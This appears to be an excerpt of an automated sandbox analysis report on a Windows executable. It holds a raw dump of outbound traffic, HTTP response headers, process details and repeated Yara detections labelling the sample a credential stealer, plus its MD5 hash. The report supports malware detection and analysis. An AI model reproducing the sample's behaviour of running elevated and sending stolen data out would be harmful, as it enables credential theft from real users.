                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 1a 99 87 4a 6c 2a ce 98 31 93 05 dd de 9b a1 e0 92 44 09 4a ea bf 86 45 01 d1 90 09 15 e3 69 81 4b 28 71 35 63 5f 28 da c1 73 b0 5b a1 fb d5 74 22 63 81 af 45 70 45 b1 a3 dd 1f bf e1 e8 9f 31 c7 3f af de 1b ca b3 4e 00 d4 ea 90 f9 bd ba 28 df 81 82 9f 73 46 08 a2 2f d7 f5 cd 82 78 9e 1d 53 10 73 01 5b 62 91 2d bb 7d 7f 1c cb b8 ce d5 d4 3e 84 3b 12 c2 bd 14 d0 ac 94 ff 24 e6 6a 44 81 68 52 0e 6f 92 07 cf dc e7 91 08 0b 55 b1 b7 ca 7c 6d 3a 1a c7 cc ae a7 7f 55 74 5c cc 3c 4c 88 85 3c f6 62 79 0f 17 60 c8 1a b9 5b 64 2b 5f 93 e8 2a ed 53 aa 2e b7 53 bd ad 58 df 4b 73 d9 62 fe 9d 2b a3 01 73 98 3c 0a f5 03 33 bb b6 cf d1 f8 a9 eb fa 53 0b 26 53 36 ad 9c cd f6 9d cb bc d6 bc c5 8a d0 c5 46 ee a0 47 c9 0b 30 1f 62 3d 5a 28 2a 89 bc c6 5b fe 73 48 36 d3 96 a5
                                                  Data Ascii: Jl*1DJEiK(q5c_(s[t"cEpE1?N(sF/xSs[b-}>;$jDhRoU|m:Ut\<L<by`[d+_*S.SXKsb+s<3S&S6FG0b=Z(*[sH6
                                                  2024-10-30 01:27:11 UTC1015INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=2ra4cg3mpn7qh8beac0lq2ipkv; expires=Sat, 22 Feb 2025 19:13:49 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRS9LwPFwzCyICb7vdJ85wVpGk2aekoC8ByNsmnAPktddxklVQLFRwJFMSae8dur1R7RNrhUXCHJ5LqQjzmRSCnUiAn1yKuTPRqZ3ExlMFt1GwNYeju6eaEobmislCfMTgme7yg%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79f0adf32a924-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=226&recv=608&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573137&delivery_rate=1929380&cwnd=201&unsent_bytes=0&cid=8f6634fbc70e8c99&ts=1954&x=0"



                                                  Target ID:0
                                                  Start time:21:26:55
                                                  Start date:29/10/2024
                                                  Path:C:\Users\user\Desktop\file.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                  Imagebase:0x910000
                                                  File size:3'001'344 bytes
                                                  MD5 hash:00E4FAF579951DEDCFE07699F0816EA9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2123719627.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2075895633.0000000001197000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2123446678.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120936857.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089453948.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2090525547.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120905193.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2077335207.0000000001199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0119B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_119b000_file.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47246d5e6c1323b53e9b68885da2c9e87a57509879e31b9f266c4e8eb2150fa9
                                                    • Instruction ID: 60c37a10912743e959702791212a7b3debf22d27e0ffff3f6e78454932985009
                                                    • Opcode Fuzzy Hash: 47246d5e6c1323b53e9b68885da2c9e87a57509879e31b9f266c4e8eb2150fa9
                                                    • Instruction Fuzzy Hash: AC23D6315563A1DFCB96CF78D8D5AC17BB0EF27B2431919DDC4808E12AD339A809DB62